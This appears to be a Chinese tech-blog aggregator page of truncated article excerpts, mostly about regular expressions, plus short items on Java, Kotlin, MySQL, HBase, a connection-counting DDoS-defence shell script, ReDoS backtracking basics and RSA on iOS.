使用extract(XMLTYPE(XML),‘xphat’).getstringval()提取XML，长度过长存在报错ORA-06502:PL/SQL:数字或值错误:characterstringbuffertoosmallORA-06512:在“SYS.XMLTYPE”,line169并且存在速度较慢等问题。正则提取XML，由于这边的XML文本中Name标签，接着的标签即为Value的值，故这
余弦相似度算法和IntelliScraper python人工智能
场景当时，我说要开发一个HSipder，开发完毕的时候，我发现不太智能，通过正则表达式拿过来的相似数据实际上也不太ok，但是后面我在接触机器学习的时候听闻了余弦相似度算法，当时用他爬了一些网页，结果是很ok的，于是我把HSipder项目拆了拆加入了余弦算法，我发现准确度上去了一个维度。很Nice，随机我将其发布到pypi库，并且开源，命名为IntelliScraper，意思是智能爬，也有人工智能的
C#知识点-17（正则表达式）土豆下土前端
正则表达式概念：正则表达式是用来进行文本处理的技术，是语言无关的，在几乎所有语言中都有实现元字符：1、.：匹配除\n之外的任何单个字符。例如正则表达式“b.g”能匹配如下字符串：“big”、“bug”、“bg”，但是不匹配“buug”，“b..g”可以匹配“buug”。2、[]：字符组，匹配括号中的任何一个字符（范围,字符集合）。例如正则表达式“b[aui]g”匹配bug、big和bag，但是不匹
ES6 - Day4 - 正则表达式今天会下雨吗 es6 字符串正则表达式 js javascript
目标能够说出正则表达式的作用能够写出简单的正则表达式能够使用正则表达式对表单进行验证能够使用正则表达式替换内容1正则表达式概述1.1什么是正则表达式正则表达式（RegularExpression）是用于匹配字符串中字符组合的模式。在JavaScript中，正则表达式也是对象。正则表通常被用来检索、替换那些符合某个模式（规则）的文本，例如验证表单：用户名表单只能输入英文字母、数字或者下划线，昵称输入
Kotlin基础——DSL 松仔log #Kotlin基础 kotlin 开发语言 android
DSL（领域特定语言）常见的DSL就是SQL和正则表达式，用于操作数据库和文本字符串，KotlinDSL通常为嵌套的Lambda表达式或链式方法，如https://github.com/gradle/gradle-script-kotlin用于构建Gradle脚本https://github.com/JetBrains/Exposed用于操作数据库https://github.com/Kotlin
Python笔记五之正则表达式后端python正则表达式
本文首发于公众号：Hunter后端原文链接：Python笔记五之正则表达式这一篇笔记介绍在Python里使用正则表达式。正则表达式，RegularExpression，可用于在一个目标字符串里对于指定模式的字符进行查找、替换、分割等操作。比如，判断某个字符串里是否都是数字，或者是否包含指定字符串，又或者更直接的例子是判断电话号码或者邮箱是否合法等。这一篇笔记里，我们将先介绍一个正则表达式的函数，并
利用正则表达式判断字符串是否只有小写字母或数字。 qq_59812342 Python 正则表达式 python
importres=input()list=re.findall(r'[0-9a-z]',s)iflen(list)==len(s):print('Y')else:print('N')
Java Pattern正则匹配，并获取匹配内容 @航空母舰 java 开发语言
java.util.regex包主要包括以下三个类：Pattern类：pattern对象是一个正则表达式的编译表示。Pattern类没有公共构造方法。要创建一个Pattern对象，你必须首先调用其公共静态编译方法，它返回一个Pattern对象。该方法接受一个正则表达式作为它的第一个参数。Matcher类：Matcher对象是对输入字符串进行解释和匹配操作的引擎。与Pattern类一样，Matche
c# 目录文件夹去掉中文李建军 C#
核心思想如下Regexreg=newRegex(@"[\u4e00-\u9fa5]");//正则表达式可以用来判断字符串中是否包含中文str=reg.Replace(str,"");//将中文字符替换成空字段destFolderPath=fsinfo.FullName.Replace(fsinfo.Name,"")+str;//获取上级目录+新文件名if(Regex.IsMatch(fsinfo.
reDOS攻击补天阁 android ReDos攻击 web安全正则表达式
正则表达式回溯：当涉及到正则表达式的回溯时，让我们来看一个具体的例子。考虑以下正则表达式模式a+b，其中a+表示匹配一个或多个连续的字符"a"，b表示匹配字符"b"。现在，假设有一个输入字符串为"aaab"，我们试图将这个字符串与模式进行匹配。以下是回溯的过程：引擎开始尝试匹配a+，它找到了第一个"a"。然后引擎尝试匹配更多的"a"，发现了两个额外的"a"。此时，引擎已经匹配了三个"a"，接下来它
飞浆：零代码创建Prompt应用实战课程笔记【持续更新中】 AI一天，人间一年 prompt 笔记
飞浆：零代码创建Prompt应用实战课Prompt基本定义驱动大模型进行表达的文本描述例1：画一幅画，呆萌的小猫躺在大泡泡中，可爱温柔，动漫风格，暖系色调，居中，面对镜头，虚拟引擎，棉花糖质感，光线追踪，机制细节，质感细腻，8K，超高清，超广角，极致清晰，丁达尔效应例2：请生成一张统计图，内容为：橘子10个，苹果20个，梨15个，猕猴桃10个例3：帮我撰写一个验证邮箱的正则表达式Prompt入门公
[转载] Python_正则表达式匹配Word文档 ey_snail
参考链接：Python中的正则表达式2(搜索，匹配和查找全部)使用正则表达式匹配Word文档中的所有字符1、原文内容如下：2、期望得到的结果：3、源码：//fromdocximportDocumentimportrepattern=re.compile("\d{6}[\u4e00-\u9fff]+")#正则表达式#pattern=re.compile("\d{6}[^A-Za-z0-9\!\%\[
多线程编程之存钱与取钱周凡杨 java thread 多线程存钱取钱
生活费问题是这样的：学生每月都需要生活费，家长一次预存一段时间的生活费，家长和学生使用统一的一个帐号，在学生每次取帐号中一部分钱，直到帐号中没钱时通知家长存钱，而家长看到帐户还有钱则不存钱，直到帐户没钱时才存钱。问题分析：首先问题中有三个实体，学生、家长、银行账户，所以设计程序时就要设计三个类。其中银行账户只有一个，学生和家长操作的是同一个银行账户，学生的行为是
java中数组与List相互转换的方法征客丶 JavaScript java jsonp
1.List转换成为数组。（这里的List是实体是ArrayList) 　　调用ArrayList的toArray方法。　　toArray 　　public T[] toArray(T[] a)返回一个按照正确的顺序包含此列表中所有元素的数组；返回数组的运行时类型就是指定数组的运行时类型。如果列表能放入指定的数组，则返回放入此列表元素的数组。否则，将根据指定数组的运行时类型和此列表的大小分
Shell 流程控制 daizj 流程控制 if else while case shell
Shell 流程控制和Java、PHP等语言不一样，sh的流程控制不可为空，如(以下为PHP流程控制写法)： <?php if(isset($_GET["q"])){ search(q);}else{// 不做任何事情} 在sh/bash里可不能这么写，如果else分支没有语句执行，就不要写这个else，就像这样 if else if if 语句语
Linux服务器新手操作之二周凡杨 Linux 简单操作
1.利用关键字搜寻Man Pages man -k keyword 其中-k 是选项，keyword是要搜寻的关键字如果现在想使用whoami命令，但是只记住了前3个字符who，就可以使用 man -k who来搜寻关键字who的man命令 [haself@HA5-DZ26 ~]$ man -k
socket聊天室之服务器搭建朱辉辉33 socket
因为我们做的是聊天室，所以会有多个客户端，每个客户端我们用一个线程去实现，通过搭建一个服务器来实现从每个客户端来读取信息和发送信息。我们先写客户端的线程。 public class ChatSocket extends Thread{ Socket socket; public ChatSocket(Socket socket){ this.sock
利用finereport建设保险公司决策分析系统的思路和方法老A不折腾 finereport 金融保险分析系统报表系统项目开发
决策分析系统呈现的是数据页面，也就是俗称的报表，报表与报表间、数据与数据间都按照一定的逻辑设定，是业务人员查看、分析数据的平台，更是辅助领导们运营决策的平台。底层数据决定上层分析，所以建设决策分析系统一般包括数据层处理（数据仓库建设）。项目背景介绍通常，保险公司信息化程度很高，基本上都有业务处理系统（像集团业务处理系统、老业务处理系统、个人代理人系统等）、数据服务系统（通过
始终要页面在ifream的最顶层林鹤霄
index.jsp中有ifream，但是session消失后要让login.jsp始终显示到ifream的最顶层。。。始终没搞定，后来反复琢磨之后，得到了解决办法，在这儿给大家分享下。。 index.jsp--->主要是加了颜色的那一句 <html> <iframe name="top" ></iframe> <ifram
MySQL binlog恢复数据 aigo mysql
1，先确保my.ini已经配置了binlog： # binlog log_bin = D:/mysql-5.6.21-winx64/log/binlog/mysql-bin.log log_bin_index = D:/mysql-5.6.21-winx64/log/binlog/mysql-bin.index log_error = D:/mysql-5.6.21-win
OCX打成CBA包并实现自动安装与自动升级 alxw4616 ocx cab
近来手上有个项目,需要使用ocx控件 (ocx是什么? http://baike.baidu.com/view/393671.htm) 在生产过程中我遇到了如下问题. 1. 如何让 ocx 自动安装? a) 如何签名? b) 如何打包? c) 如何安装到指定目录? 2.
Hashmap队列和PriorityQueue队列的应用百合不是茶 Hashmap队列 PriorityQueue队列
HashMap队列已经是学过了的,但是最近在用的时候不是很熟悉,刚刚重新看以一次, HashMap是K,v键 ,值 put()添加元素 //下面试HashMap去掉重复的 package com.hashMapandPriorityQueue; import java.util.H
JDK1.5 returnvalue实例 bijian1013 java thread java多线程 returnvalue
Callable接口：返回结果并且可能抛出异常的任务。实现者定义了一个不带任何参数的叫做 call 的方法。 Callable 接口类似于 Runnable，两者都是为那些其实例可能被另一个线程执行的类设计的。但是 Runnable 不会返回结果，并且无法抛出经过检查的异常。 ExecutorService接口方
angularjs指令中动态编译的方法(适用于有异步请求的情况) 内嵌指令无效 bijian1013 JavaScript AngularJS
在directive的link中有一个$http请求，当请求完成后根据返回的值动态做element.append('......');这个操作，能显示没问题，可问题是我动态组的HTML里面有ng-click，发现显示出来的内容根本不执行ng-click绑定的方法！
【Java范型二】Java范型详解之extend限定范型参数的类型 bit1129 extend
在第一篇中，定义范型类时，使用如下的方式： public class Generics<M, S, N> { //M,S,N是范型参数 } 这种方式定义的范型类有两个基本的问题： 1. 范型参数定义的实例字段，如private M m = null;由于M的类型在运行时才能确定，那么我们在类的方法中，无法使用m，这跟定义pri
【HBase十三】HBase知识点总结 bit1129 hbase
1. 数据从MemStore flush到磁盘的触发条件有哪些？ a.显式调用flush，比如flush 'mytable' b.MemStore中的数据容量超过flush的指定容量，hbase.hregion.memstore.flush.size,默认值是64M 2. Region的构成是怎么样？ 1个Region由若干个Store组成
服务器被DDOS攻击防御的SHELL脚本 ronin47
mkdir /root/bin vi /root/bin/dropip.sh #!/bin/bash/bin/netstat -na|grep ESTABLISHED|awk ‘{print $5}’|awk -F:‘{print $1}’|sort|uniq -c|sort -rn|head -10|grep -v -E ’192.168|127.0′|awk ‘{if($2!=null&a
java程序员生存手册-craps 游戏-一个简单的游戏 bylijinnan java
import java.util.Random; public class CrapsGame { /** * *一个简单的赌*博游戏，游戏规则如下： *玩家掷两个骰子，点数为1到6，如果第一次点数和为7或11，则玩家胜， *如果点数和为2、3或12，则玩家输， *如果和为其它点数，则记录第一次的点数和，然后继续掷骰，直至点数和等于第一次掷出的点
TOMCAT启动提示NB: JAVA_HOME should point to a JDK not a JRE解决开窍的石头 JAVA_HOME
当tomcat是解压的时候，用eclipse启动正常，点击startup.bat的时候启动报错; 报错如下： The JAVA_HOME environment variable is not defined correctly This environment variable is needed to run this program NB: JAVA_HOME shou
[操作系统内核]操作系统与互联网 comsci 操作系统
我首先申明：我这里所说的问题并不是针对哪个厂商的，仅仅是描述我对操作系统技术的一些看法操作系统是一种与硬件层关系非常密切的系统软件，按理说，这种系统软件应该是由设计CPU和硬件板卡的厂商开发的，和软件公司没有直接的关系，也就是说，操作系统应该由做硬件的厂商来设计和开发
富文本框ckeditor_4.4.7 文本框的简单使用支持IE11 cuityang 富文本框
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>知识库内容编辑</tit
Property null not found darrenzhu datagrid Flex Advanced propery null
When you got error message like "Property null not found ***", try to fix it by the following way: 1)if you are using AdvancedDatagrid, make sure you only update the data in the data prov
MySQl数据库字符串替换函数使用 dcj3sjt126com mysql 函数替换
需求：需要将数据表中一个字段的值里面的所有的 . 替换成 _ 原来的数据是 site.title site.keywords .... 替换后要为 site_title site_keywords 使用的SQL语句如下： updat
mac上终端起动MySQL的方法 dcj3sjt126com mysql mac
首先去官网下载: http://www.mysql.com/downloads/ 我下载了5.6.11的dmg然后安装,安装完成之后..如果要用终端去玩SQL.那么一开始要输入很长的:/usr/local/mysql/bin/mysql 这不方便啊,好想像windows下的cmd里面一样输入mysql -uroot -p1这样...上网查了下..可以实现滴. 打开终端,输入: 1
Gson使用一（Gson） eksliang json gson
转载请出自出处：http://eksliang.iteye.com/blog/2175401 一.概述从结构上看Json，所有的数据（data）最终都可以分解成三种类型：第一种类型是标量（scalar），也就是一个单独的字符串（string）或数字（numbers），比如"ickes"这个字符串。第二种类型是序列（sequence），又叫做数组（array）
android点滴4 gundumw100 android
Android 47个小知识 http://www.open-open.com/lib/view/open1422676091314.html Android实用代码七段（一） http://www.cnblogs.com/over140/archive/2012/09/26/2611999.html http://www.cnblogs.com/over140/arch
JavaWeb之JSP基本语法 ihuning javaweb
目录 JSP模版元素 JSP表达式 JSP脚本片断 EL表达式 JSP注释特殊字符序列的转义处理如何查找JSP页面中的错误 JSP模版元素 JSP页面中的静态HTML内容称之为JSP模版元素，在静态的HTML内容之中可以嵌套JSP
App Extension编程指南（iOS8/OS X v10.10）中文版啸笑天 ext
当iOS 8.0和OS X v10.10发布后，一个全新的概念出现在我们眼前，那就是应用扩展。顾名思义，应用扩展允许开发者扩展应用的自定义功能和内容，能够让用户在使用其他app时使用该项功能。你可以开发一个应用扩展来执行某些特定的任务，用户使用该扩展后就可以在多个上下文环境中执行该任务。比如说，你提供了一个能让用户把内容分
SQLServer实现无限级树结构 macroli oracle sql SQL Server
表结构如下：数据库id path titlesort 排序 1 0 首页 0 2 0,1 新闻 1 3 0,2 JAVA 2 4 0,3 JSP 3 5 0,2,3 业界动态 2 6 0,2,3 国内新闻 1 创建一个存储过程来实现，如果要在页面上使用可以设置一个返回变量将至传过去 create procedure test as begin decla
Css居中div，Css居中img，Css居中文本，Css垂直居中div qiaolevip 众观千象学习永无止境每天进步一点点 css
/**********Css居中Div**********/ div.center { width: 100px; margin: 0 auto; } /**********Css居中img**********/ img.center { display: block; margin-left: auto; margin-right: auto; }
Oracle 常用操作(实用) 吃猫的鱼 oracle
SQL>select text from all_source where owner=user and name=upper('&plsql_name'); SQL>select * from user_ind_columns where index_name=upper('&index_name'); 将表记录恢复到指定时间段以前
iOS中使用RSA对数据进行加密解密 witcheryne ios rsa iPhone objective c
RSA算法是一种非对称加密算法,常被用于加密数据传输.如果配合上数字摘要算法, 也可以用于文件签名. 本文将讨论如何在iOS中使用RSA传输加密数据. 本文环境 mac os openssl-1.0.1j, openssl需要使用1.x版本, 推荐使用[homebrew](http://brew.sh/)安装. Java 8 RSA基本原理 RS